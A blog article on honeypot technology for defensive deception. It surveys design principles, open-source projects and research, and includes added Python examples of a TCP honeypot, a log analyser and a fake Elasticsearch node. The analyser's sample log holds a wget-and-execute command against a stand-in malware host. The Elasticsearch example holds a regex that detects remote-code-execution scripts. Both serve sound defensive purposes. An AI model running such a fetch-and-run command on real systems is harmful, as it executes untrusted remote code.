Active defense - honeypot technology research

Honeypot

  A honeypot is a deception technique aimed at the attacking party: hosts, network services or information are deployed as bait to lure the attacker into attacking them, so that the attack can be captured and analyzed. From this the defender learns the tools and methods the attacker uses, infers the attacker's intentions and motives, gains a clear picture of the security threats actually faced, and improves the real security system through technical and management measures.

Why honeypot technology is used

  Information security has developed considerably, yet detection still relies largely on traditional, static signatures to identify attacks. With the emergence of APT attacks, many companies have realized that traditional security technology cannot discover threats that are already inside the network, so established vendors have turned to dynamic sandbox technology (for example Symantec ATP-type appliances paired with SEP endpoint agents) or to threat-intelligence linkage (for example 360 Safeguard) to detect unknown threats. These approaches mainly address the first stage of an APT: the attacker obtains user information through social engineering and gets onto a personal PC inside the enterprise network by phishing or a watering-hole attack. To reach valuable internal sensitive information, however, the attacker must extend the attack chain: access documents, scan and probe network assets, and so on. Many industries, including financial institutions, do not permit security agents to be installed on business servers, and sometimes not even a logging agent. In that situation a honeypot deployed inside the network is currently the best solution.


Honeypot technical analysis:

  Honeypot technology builds simulated systems to deceive the attacker, raise the cost of attack and reduce the threat to the real system. At the same time it records the tools and methods the attacker uses so that they can be studied and appropriate security measures chosen. Honeypot technology consists of four key parts: deception, data capture, data control and data analysis.

  Honeypot deception mainly uses vulnerability spoofing, IP spoofing and traffic spoofing. Vulnerability spoofing typically emulates system services and ports that contain flaws in order to attract attacks and gather, from the responses on those ports and services, the information the defender needs. IP spoofing misleads the attacker by answering for many IP addresses from a single network adapter, so that the attacker believes there are many targets on the network. Traffic spoofing uses simulation and real-time replication to create virtual network traffic that closely resembles the flow of a real network, so that the fictitious network looks genuine and the attacker is induced to attack and exploit it.

  The main purpose of data capture is to obtain and record the attacker's behaviour; it can be implemented as host capture or network capture. Host capture obtains and records the attacker's behaviour on the honeypot itself; it is quick and simple but is easily seen through by the attacker. Network capture obtains and records the attacker's behaviour by building a honeynet; it is harder for the attacker to detect but more complex to implement.

  Data control is one of the core functions of a honeypot system: it prevents the attacker from using the honeypot as a springboard against other information systems, which requires monitoring and limiting the attacker's behaviour. It usually takes two forms, firewall control and router control.
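The three mechanisms described above (service spoofing, host-side capture and data control) in one minimal TCP honeypot, as an added example that is not code from the original article or from any project it names. The banners (vsFTPd and OpenSSH version strings), the ports 21 and 22, the session limits and the log file name are assumptions; a real deployment would usually listen on high ports and redirect the low ports to them with a firewall rule, which is also where the router/firewall side of data control would sit.

```python
"""Minimal low-interaction TCP honeypot (added example): banner spoofing, host-side JSON capture, data-control limits; banners, ports and limits are assumed values."""
import json, socket, threading, time
from collections import defaultdict, deque

FAKE_BANNERS = {21: b"220 (vsFTPd 2.3.4)\r\n", 22: b"SSH-2.0-OpenSSH_5.3\r\n"}  # deception
MAX_BYTES_PER_SESSION, SESSION_TIMEOUT = 4096, 30.0   # data control: per-session caps
MAX_SESSIONS_PER_SOURCE, SOURCE_WINDOW = 5, 3600.0    # data control: per-source cap


class SourceLimiter:
    """Sliding-window cap on sessions per source IP (data control)."""
    def __init__(self, limit=MAX_SESSIONS_PER_SOURCE, window=SOURCE_WINDOW):
        self.limit, self.window = limit, window
        self._seen, self._lock = defaultdict(deque), threading.Lock()

    def allow(self, src_ip, now=None):
        now = time.monotonic() if now is None else now
        with self._lock:
            q = self._seen[src_ip]
            while q and now - q[0] > self.window:
                q.popleft()                               # forget hits outside the window
            if len(q) >= self.limit:
                return False
            q.append(now)
            return True


def fake_reply(port, line):
    """Deception: answer the FTP probes scanners send so they keep talking."""
    if port != 21:
        return b""                                        # SSH: banner only, just capture
    cmd = line.split(b" ", 1)[0].upper()
    return {b"USER": b"331 Please specify the password.\r\n",
            b"PASS": b"530 Login incorrect.\r\n",
            b"QUIT": b"221 Goodbye.\r\n"}.get(cmd, b"500 Unknown command.\r\n")


def handle_session(port, peer, recv, send, limiter, clock=time.monotonic):
    """One session over abstract recv()/send() callables (testable without sockets);
    recv() returns b'' on EOF.  Returns the capture record (host-side data capture)."""
    record = {"ts": time.time(), "src_ip": peer[0], "src_port": peer[1], "dst_port": port,
              "refused": False, "truncated": False, "lines": [], "bytes_received": 0}
    if not limiter.allow(peer[0]):
        record["refused"] = True                          # over the per-source cap
        return record
    send(FAKE_BANNERS.get(port, b""))
    deadline, buf, total = clock() + SESSION_TIMEOUT, bytearray(), 0
    while clock() < deadline:
        chunk = recv()
        if not chunk:
            break
        total += len(chunk)
        if total > MAX_BYTES_PER_SESSION:
            record["truncated"] = True                    # cap captured input
            break
        buf += chunk
        while b"\n" in buf:                               # capture and answer line by line
            line, _, rest = bytes(buf).partition(b"\n")
            buf, line = bytearray(rest), line.rstrip(b"\r")
            record["lines"].append(line.decode("latin-1"))
            send(fake_reply(port, line))
    if buf:                                               # trailing bytes, e.g. SSH key exchange
        record["lines"].append(bytes(buf).decode("latin-1"))
    record["bytes_received"] = total
    return record


def serve(port, limiter, logfile="honeypot.jsonl", bind="0.0.0.0"):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind, port))
    srv.listen(16)

    def worker(conn, peer):
        conn.settimeout(SESSION_TIMEOUT)                  # idle attacker ends the session
        def recv():
            try:
                return conn.recv(1024)
            except OSError:                               # timeout or reset: treat as EOF
                return b""
        def send(data):
            try:
                data and conn.sendall(data)
            except OSError:
                pass
        try:
            rec = handle_session(port, peer, recv, send, limiter)
            with open(logfile, "a") as fh:
                fh.write(json.dumps(rec) + "\n")          # one JSON record per session
        finally:
            conn.close()
    while True:                                           # one thread per attacker connection
        conn, peer = srv.accept()
        threading.Thread(target=worker, args=(conn, peer), daemon=True).start()


if __name__ == "__main__":                                # binding 21 needs root
    serve(21, SourceLimiter())
```

The byte and time caps and the per-source connection cap are the host-side half of data control: they bound what an attacker can push through the honeypot, but they do not stop the honeypot host itself from initiating connections, so a firewall rule restricting outbound traffic from the honeypot is still needed alongside them.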

  Data analysis turns the various data collected by the honeypot into meaningful, understandable information, from which the attacker's techniques and strategies can be understood and valuable intelligence extracted, providing support for both attack and defence preparedness.
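Data analysis as described above, as an added example that is not from the article or from any honeypot project: it reduces a handful of constructed SSH-honeypot records to the facts a defender acts on (credential lists tried, noisiest sources, which sessions were actually compromised and what they ran, and URLs to block). The field names are assumed to follow Cowrie's JSON log format; the values, addresses and URL are invented.

```python
"""Data analysis over honeypot JSON logs (added example, not from Cowrie or any project on
the page).  The records below are constructed; field names follow Cowrie's JSON output
(eventid, session, src_ip, username, password, input, url), which is an assumption."""
import json, re
from collections import Counter, defaultdict

SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","session":"s1","src_ip":"198.51.100.7"}
{"eventid":"cowrie.login.failed","session":"s1","src_ip":"198.51.100.7","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","session":"s1","src_ip":"198.51.100.7","username":"root","password":"admin"}
{"eventid":"cowrie.login.success","session":"s1","src_ip":"198.51.100.7","username":"root","password":"password"}
{"eventid":"cowrie.command.input","session":"s1","src_ip":"198.51.100.7","input":"uname -a"}
{"eventid":"cowrie.command.input","session":"s1","src_ip":"198.51.100.7","input":"wget http://malware.example/x.sh -O /tmp/x.sh; sh /tmp/x.sh"}
{"eventid":"cowrie.session.file_download","session":"s1","src_ip":"198.51.100.7","url":"http://malware.example/x.sh","shasum":"e3b0c442"}
{"eventid":"cowrie.session.connect","session":"s2","src_ip":"203.0.113.9"}
{"eventid":"cowrie.login.failed","session":"s2","src_ip":"203.0.113.9","username":"admin","password":"123456"}
{"eventid":"cowrie.login.failed","session":"s2","src_ip":"203.0.113.9","username":"root","password":"123456"}
this line is corrupt and must be skipped, not crash the analysis
"""

URL_RE = re.compile(r"https?://[^\s;|&'\"<>]+")


def parse_events(text):
    """Parse JSON lines, skipping corrupt ones (a crash here loses the whole day's data)."""
    events = []
    for line in text.splitlines():
        try:
            ev = json.loads(line)
        except ValueError:
            continue
        if isinstance(ev, dict) and "eventid" in ev:
            events.append(ev)
    return events


def summarize(events):
    """Turn raw events into attacker-centric facts: credential lists, noisiest sources,
    and per-session outcome (did they get in, what did they run, what did they fetch)."""
    creds, sources = Counter(), Counter()
    sessions = defaultdict(lambda: {"src_ip": None, "compromised": False,
                                    "commands": [], "downloads": []})
    for ev in events:
        s = sessions[ev.get("session")]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev["eventid"]
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            creds[(ev["username"], ev["password"])] += 1
            sources[ev["src_ip"]] += 1
            s["compromised"] |= eid.endswith("success")
        elif eid == "cowrie.command.input":
            s["commands"].append(ev["input"])
        elif eid == "cowrie.session.file_download":
            s["downloads"].append(ev["url"])
    return {"top_credentials": creds.most_common(5),
            "top_sources": sources.most_common(5), "sessions": dict(sessions)}


def iocs(summary):
    """Indicators worth blocking: every URL that was fetched or merely referenced in a command."""
    urls = set()
    for s in summary["sessions"].values():
        urls.update(s["downloads"])
        for cmd in s["commands"]:
            urls.update(URL_RE.findall(cmd))
    return sorted(urls)


def report(text):
    summary = summarize(parse_events(text))
    lines = ["top credentials: " + ", ".join(f"{u}:{p} x{n}" for (u, p), n in summary["top_credentials"]),
             "top sources:     " + ", ".join(f"{ip} x{n}" for ip, n in summary["top_sources"])]
    for sid, s in summary["sessions"].items():
        lines.append(f"session {sid} from {s['src_ip']}: compromised={s['compromised']}, "
                     f"{len(s['commands'])} commands, {len(s['downloads'])} downloads")
    lines.append("iocs: " + ", ".join(iocs(summary)))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_LOG))
```

Extracting URLs from the command lines as well as from the download events matters because a honeypot that refuses or fails the download still records the command, and the URL in it is the indicator the rest of the network should block.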
 


Honeypot luring (traffic diversion) technology:

  The honeypot protection process has three stages: decoy environment construction, intrusion monitoring and post-processing. In decoy environment construction, fake data, files and so on are created to increase the sweetness of the honeypot environment and lure the attacker into the system, so that interaction with the attack is achieved. The level of interaction depends on how deceptive and realistic the environment is; there are two main construction schemes, simulated environments and real systems.

  The simulated-environment scheme attracts attackers by simulating the important features of a real system, and has the advantage of easy deployment. One or more open-source honeypots can be used to emulate multiple honeypots, combining the advantages of different schemes and favouring integration; a simulation scheme can be combined with a virtual honeypot system to build a custom architecture with a higher degree of interaction; and a hardware simulator or hardware virtualization can be used to avoid damage to real hardware. However, the characteristic features of a virtual simulated environment mean that this scheme runs the risk of being identified (fingerprinted) by the attacker.

  The real-system scheme uses real hardware and software as the operating environment, which lowers the rate at which the honeypot is recognized and greatly improves interaction with the attack. On the software side, real system interfaces, real hosted services and real operating systems give a higher degree of interaction and deception, but at high cost, and the protected resources face the risk of damage. On the hardware side, real devices can be used directly to trap attack information, for example a physical wearable device as a lure node, or a mobile phone SIM card or other card as the honey; building the environment from real software and hardware raises the degree of deception. Luring the attacker with real hardware and software has advantages in low-throughput scenarios, but for business systems with frequent internal data exchange it suffers from high energy consumption, difficult deployment and high maintenance cost.
 


Foreign research on honeypot decoys:

    Sochor et al. analyzed the honeynet topology model, simulated SSH attack sensors, and simulated attacks on Windows services and web services, studying network threat detection and the attractiveness (sweetness) of honeypots within a honeynet. Experiments showed that the lure plays an important role in drawing the attacker toward the security defenses.

    Dahbul et al. used network service fingerprints to enhance the deceptive ability of honeypots. They constructed three attacker threat models, analyzed the fingerprints that can be used to tell a honeypot from a real system, and on that basis systematically enhanced the honeypot by opening and configuring the necessary ports, fixing timestamps, configuring scripts and other means.
 


Honeypot technology architecture:

  1.BitSaucer. A hybrid honeypot that integrates low-interaction and high-interaction honeypots, combining the low resource requirements of a low-interaction honeypot with the high responsiveness of a high-interaction honeypot. Its key mechanism is an agent designed to run on the host. The agent daemon automatically generates, on the basis of observed network traffic, the high-interaction honeypots that are needed. Because high-interaction honeypots are generated on demand, resource consumption is greatly reduced.

  2.Honeynet http://www.honeynet.org/

  3.kippo https://github.com/desaster/kippo

  4.glastopf https://github.com/mushorg/glastopf

  5.elastichoney https://github.com/jordan-wright/elastichoney

  6.beeswarm https://github.com/honeynet/beeswarm

  7.DejaVU is an open-source deception framework built on docker. When an attacker touches a decoy or tries to authenticate against one in the course of reconnaissance, it generates high-accuracy alerts for defenders to investigate.

  8.MHN (Modern Honey Network). MHN is open-source software that simplifies the deployment of honeypots and facilitates the collection and statistical analysis of honeypot data.

  • Using ThreatStream's MHN (http://threatstream.github.io/mhn/), open-source honeypots are deployed and the data they collect is gathered and stored in MongoDB; the collected information can be viewed through the web interface or accessed through the API. MHN supports a variety of open-source honeypots, which can be added through the web interface. Deploying a honeypot is very simple: copy and paste the deployment command, and once deployment is complete the collected information is reported back over the open hpfeeds protocol.
  • MHN supports the following honeypots:
  • Snort: https://www.snort.org/
  • Suricata: http://suricata-ids.org/
  • Dionaea: http://dionaea.carnivore.it/ . Dionaea is an application that runs on Linux; in a network environment it listens on the default ports of common Internet services and, when an external connection arrives, emulates the normal service response while recording the network data stream. The captured stream is classified by detection modules; if shellcode is detected it is emulated, and the download command or subsequent action specified by the shellcode is followed to fetch the malicious file. Drops has an article on it: http://drops.wooyun.org/papers/4584
  • Conpot: http://conpot.org/
  • Kippo: https://github.com/desaster/kippo . A medium-interaction SSH honeypot that can also fetch the files the attacker tries to download. Drops has an article on it: http://drops.wooyun.org/papers/4578
  • Amun: http://amunhoney.sourceforge.net/ . A low-interaction honeypot, but it has not been maintained since 2012.
  • Glastopf: http://glastopf.org/ . A low-interaction web application honeypot. Glastopf can emulate thousands of web vulnerabilities and respond differently to different attacks, collecting data on attacks aimed at web applications. It targets automated vulnerability scanners and exploitation tools: exploits are classified by type, and for each type of exploitation pattern a plausible response is returned, which is what achieves the low interaction.
  • Wordpot: https://github.com/gbrindisi/wordpot
  • ShockPot: https://github.com/threatstream/shockpot , emulates CVE-2014-6271, the Shellshock vulnerability
  • p0f: https://github.com/p0f/p0f

  9.Cowrie is a medium-interaction SSH honeypot. The dictionaries attackers use to brute-force SSH, the commands they enter, and the files they upload or download are all recorded in its logs, which can also be written to a database for convenient querying.

  10.Elasticpot: a honeypot that emulates the Elasticsearch RCE vulnerability by forging the JSON responses a vulnerable ES instance would return to requests for /, /_search and /_nodes.

  11.Emobility: a high-interaction honeypot container used in T-Pot, designed to collect attack motives and methods against next-generation transportation infrastructure. The Emobility honeynet contains a central charging system and several charging points, and simulates user transactions. Once an attacker gains access to the web interface of the control system, they can monitor and manipulate the charging transactions being processed and interact with the charging points. In addition, at random times, the attacker may interact with simulated users whose vehicle charging fees are being collected.

  12.Honeytrap: observes attacks against TCP or UDP services. It runs as a daemon, emulates some well-known services, can analyze the attack strings and follows the instructions they contain to download files.

  13.Conpot: a low-interaction ICS (industrial control system) honeypot that offers a range of common industrial control protocols and can emulate complex industrial infrastructure.

  14.OpenCanary: a low-interaction internal-network honeypot, officially open-sourced. The current version 0.4 keeps pace with the official release and supports 16 protocols and 24 kinds of attack signature recognition. Project address: https://github.com/p1r06u3/opencanary_web
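How an Elasticpot-style honeypot forges the Elasticsearch responses described in item 10, as an added example that is not Elasticpot's own code. It answers /, /_nodes and /_search with JSON shaped like a vulnerable Elasticsearch 1.4.x node and flags search bodies whose script tries to reach java.lang.Runtime, the pattern of the Groovy sandbox-bypass RCE (CVE-2015-1427) in that version line. The version number, build hash, node name, cluster name, addresses, log file name and the detection regex are assumed values.

```python
"""Elasticpot-style fake Elasticsearch (added example, not Elasticpot's code).  It serves the
JSON a vulnerable ES 1.4.x node would return for /, /_nodes and /_search, and tags requests
whose search script tries to reach java.lang.Runtime (the CVE-2015-1427 Groovy RCE pattern).
Version strings, build hash, node names, addresses and the detection regex are assumptions."""
import json, re, time
from http.server import BaseHTTPRequestHandler, HTTPServer

LOGFILE = "elasticpot.jsonl"
FAKE_VERSION = "1.4.2"                                    # last 1.4.x release before the fix
FAKE_ROOT = {"status": 200, "name": "Blizzard", "cluster_name": "elasticsearch",
             "version": {"number": FAKE_VERSION, "build_hash": "927caff6f05403e936c20bf4529f144f0c89fd8c",
                         "build_timestamp": "2014-12-16T14:11:12Z", "build_snapshot": False,
                         "lucene_version": "4.10.2"}, "tagline": "You Know, for Search"}
FAKE_NODES = {"cluster_name": "elasticsearch",
              "nodes": {"x1Yw9oAsTF2f7pUqcKm1nQ": {"name": "Blizzard", "host": "es-01", "ip": "10.0.0.5",
                                                   "transport_address": "inet[/10.0.0.5:9300]",
                                                   "http_address": "inet[/10.0.0.5:9200]",
                                                   "version": FAKE_VERSION, "build": "927caff"}}}
EMPTY_SEARCH = {"took": 2, "timed_out": False, "_shards": {"total": 5, "successful": 5, "failed": 0},
                "hits": {"total": 0, "max_score": None, "hits": []}}
RCE_RE = re.compile(r"java\.lang\.Runtime|getRuntime\s*\(|ProcessBuilder|Class\.forName")


def find_scripts(doc):
    """Collect every string under a key named 'script' anywhere in the request body."""
    found = []
    if isinstance(doc, dict):
        for k, v in doc.items():
            if k == "script" and isinstance(v, str):
                found.append(v)
            else:
                found.extend(find_scripts(v))
    elif isinstance(doc, list):
        for v in doc:
            found.extend(find_scripts(v))
    return found


def es_response(method, path, body):
    """Decide what to answer and what to log.  Returns (status, json_payload, record)."""
    route = path.split("?", 1)[0].rstrip("/") or "/"
    record = {"ts": time.time(), "method": method, "path": path, "tags": [], "scripts": []}
    if route == "/":
        record["tags"].append("banner_probe")             # version fingerprinting by scanners
        return 200, FAKE_ROOT, record
    if route.startswith("/_nodes"):
        record["tags"].append("nodes_probe")
        return 200, FAKE_NODES, record
    if route.endswith("/_search"):                        # /_search, /idx/_search, /idx/type/_search
        record["tags"].append("search")
        try:
            doc = json.loads(body) if body else {}
        except ValueError:
            doc = {}
            record["tags"].append("bad_json")
        record["scripts"] = find_scripts(doc)
        if any(RCE_RE.search(s) for s in record["scripts"]):
            record["tags"].append("rce_attempt")          # the alert worth paging on
        return 200, EMPTY_SEARCH, record
    record["tags"].append("unknown_path")
    index = route.strip("/").split("/")[0]
    return 404, {"error": "IndexMissingException[[%s] missing]" % index, "status": 404}, record


class Handler(BaseHTTPRequestHandler):
    def send_response(self, code, message=None):
        self.send_response_only(code, message)            # no Server/Date headers: ES 1.x sends none
        self.send_header("Content-Type", "application/json; charset=UTF-8")

    def _handle(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length).decode("utf-8", "replace") if length else ""
        status, payload, record = es_response(self.command, self.path, body)
        record["src_ip"], record["body"] = self.client_address[0], body[:4096]
        with open(LOGFILE, "a") as fh:
            fh.write(json.dumps(record) + "\n")           # one JSON record per request
        data = json.dumps(payload).encode()
        self.send_response(status)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    do_GET = do_POST = do_PUT = do_DELETE = _handle

    def log_message(self, *args):
        pass                                              # the JSON log replaces stderr noise


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 9200), Handler).serve_forever()
```

The send_response override matters more than it looks: Python's http.server otherwise adds a "Server: BaseHTTP/... Python/..." header to every reply, which is exactly the kind of service fingerprint the Dahbul-style checks described above would use to unmask the honeypot.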


New directions in honeypot technology:

  Honeypots evolve in the contest between attack and defense, and attackers keep upgrading their own techniques. Improving the sweetness of honeypots, their deceptive ability and the traditional architecture remains the focus of development, specifically: (1) Integrating artificial intelligence with honeypots: for intruders with differing motives, AI can give the honeypot intelligent interaction, improving its ability to learn and to resist recognition, so that more interaction data is obtained in support of defensive decisions. (2) Integrating blockchain with honeypots: distributed honeypots and distributed honeynet architectures can borrow the distributed, decentralized technology of blockchain, using a private or consortium chain on a P2P architecture to automate honeypot operation and keep internal system data concealed. (3) Integrating genetic and evolutionary computation with honeypots: in a complex, changing offensive and defensive environment, the honeypot can use the high robustness and generality of evolutionary computation to adapt to different problems in different environments, giving it adaptive, self-organizing and self-evolving properties.

  In terms of application, integrating honeypots with new technologies and expanding into new fields is the future trend: (1) With the popularity of cloud services at every level (IaaS, PaaS, SaaS), honeypot research can be offered to security personnel as a convenient cloud service; as an extension of cloud computing, edge computing uses devices at the network edge and has the advantage of low latency. Combining honeypots with edge computing, an IoT honeypot can process the data collected by terminal devices and sensors and send the result up to the cloud service layer, improving processing speed and reducing the instantaneous load on the server. (2) Current honeypot research focuses on traditional network architecture. SDN (Software Defined Networking), as a new network architecture, has the advantages of programmability and open interfaces, and some open-source SDN projects have suffered denial-of-service attacks, attacks on the northbound interface protocol and similar; honeypots can therefore be applied to SDN to trick attackers at the controller and interface level and maintain network security and stability. (3) With the tight integration of hardware and software that characterizes the "new hardware era", new hardware devices such as unmanned vehicles and 3D printers are becoming new targets; lightweight honeypots can be combined with these devices to detect and identify suspicious attacks and refuse to execute malicious instructions.

  New honeypot technology: HADES (High-Fidelity Adaptive Deception & Emulation System). The main thrust of HADES is to provide a deceptive environment that encourages the attacker to keep acting, so that information and signatures about the ongoing attack can be sorted out. Technically, HADES uses cloud technology, in particular software-defined networking and virtual machine introspection: the attacked virtual system can be moved quickly from the production network into a high-fidelity virtual copy of the network from which sensitive data has been removed. HADES can migrate the virtual machine, together with its state and surroundings, to another part of the network and start the emulation there.

  While the intruder is unaware of having been moved into the sandbox network, analysts can observe the intruder's actions and learn their goals and the attack tools they use. By observing the adversary's behaviour, defenders can rebuild their defensive tools and develop their own intelligence in real time.

  Even if the hacker eventually discovers that they are operating in a sandbox, because they do not know when they were moved off the real network, they cannot tell how much of the data they collected is genuine. The aim of HADES is to make the attacker doubt: is what I obtained real or fake? For an attacker the most frightening thing is that "the world is still the world, but it has changed."

  HADES does not, however, replace attack detection tools. Although HADES also provides intrusion detection, it does so through third-party applications, and it offers a flexible application programming interface for interacting with those tools.


WeChat: austfish

Let me introduce myself: I am Fisher, an Internet security author. I share interesting security technology stories every day and, of course, record what I gain along the road of learning. If you are interested in the security field, you can follow my personal WeChat public account: austfish. Want to join in? Please follow [Security] Fisher's diary! (Don't forget to star it.) Or visit my personal blog: www.austfish.cn

 


Source: www.cnblogs.com/austfish/p/11589525.html